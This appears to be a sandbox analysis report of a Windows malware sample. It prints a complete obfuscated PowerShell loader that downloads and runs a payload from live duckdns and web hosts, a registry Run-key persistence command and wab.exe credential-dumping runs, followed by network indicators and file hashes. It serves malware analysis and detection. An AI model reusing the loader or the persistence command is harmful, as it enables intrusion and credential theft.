"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ckqp"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nevhszl"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xgiatrwwao"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | madibarohilalatwo.duckdns.org | udp |
| DE | 84.247.187.12:80 | madibarohilalatwo.duckdns.org | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.187.247.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cadenaderegalos.com | udp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 8.8.8.8:53 | 125.68.49.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | odogwuvisual123.duckdns.org | udp |
| SG | 206.123.138.32:6767 | odogwuvisual123.duckdns.org | tcp |
| US | 8.8.8.8:53 | 32.138.123.206.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| SG | 206.123.138.32:6767 | odogwuvisual123.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
memory/1556-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp
memory/1556-10-0x0000015C111D0000-0x0000015C111F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3q0im1hw.zzu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1556-11-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp
memory/1556-12-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp
memory/4900-15-0x0000000004840000-0x0000000004876000-memory.dmp
memory/4900-16-0x0000000004FE0000-0x0000000005608000-memory.dmp
memory/4900-17-0x0000000004FA0000-0x0000000004FC2000-memory.dmp
memory/4900-18-0x0000000005740000-0x00000000057A6000-memory.dmp
memory/4900-19-0x00000000057B0000-0x0000000005816000-memory.dmp
memory/4900-29-0x0000000005820000-0x0000000005B74000-memory.dmp
memory/4900-30-0x0000000005E20000-0x0000000005E3E000-memory.dmp
memory/4900-31-0x0000000005E40000-0x0000000005E8C000-memory.dmp
memory/4900-32-0x00000000076A0000-0x0000000007D1A000-memory.dmp
memory/4900-33-0x0000000006380000-0x000000000639A000-memory.dmp
memory/4900-34-0x00000000070C0000-0x0000000007156000-memory.dmp
memory/4900-35-0x0000000007050000-0x0000000007072000-memory.dmp
memory/4900-36-0x00000000082D0000-0x0000000008874000-memory.dmp
C:\Users\Admin\AppData\Roaming\Droh.Lit
| MD5 | 1a958060ba3e3de4653959fe2fd1efd5 |
| SHA1 | c5d3a5646dc5920668f1f61c334c7c7d40c888b5 |
| SHA256 | 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab |
| SHA512 | 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0 |
memory/4900-38-0x0000000008880000-0x000000000B149000-memory.dmp
memory/1556-39-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp
memory/1556-40-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp
memory/1556-48-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp
memory/2160-45-0x00000000016B0000-0x0000000003F79000-memory.dmp
memory/4924-52-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2256-56-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4924-57-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1204-60-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1204-59-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1204-58-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2256-55-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4924-54-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2256-53-0x0000000000400000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ckqp
| MD5 | 8651f1ecc401fe73c45d06863467d144 |
| SHA1 | 0150ba4649afe382ae1705552473bba7beb990f4 |
| SHA256 | 51827e101e890667e6d9b8aa7b804d56b53cadc110b5b8b834229788c29a65e8 |
| SHA512 | c0b371d9080c0e82adae100a9400bb7bd239cfe243c072dde0f9310524b92d16a10db9117403d8af227cef9def552dba7c04da3b3bd46a88836acc071cb9890f |
memory/2160-66-0x000000001FFE0000-0x000000001FFF9000-memory.dmp
memory/2160-70-0x000000001FFE0000-0x000000001FFF9000-memory.dmp
memory/2160-69-0x000000001FFE0000-0x000000001FFF9000-memory.dmp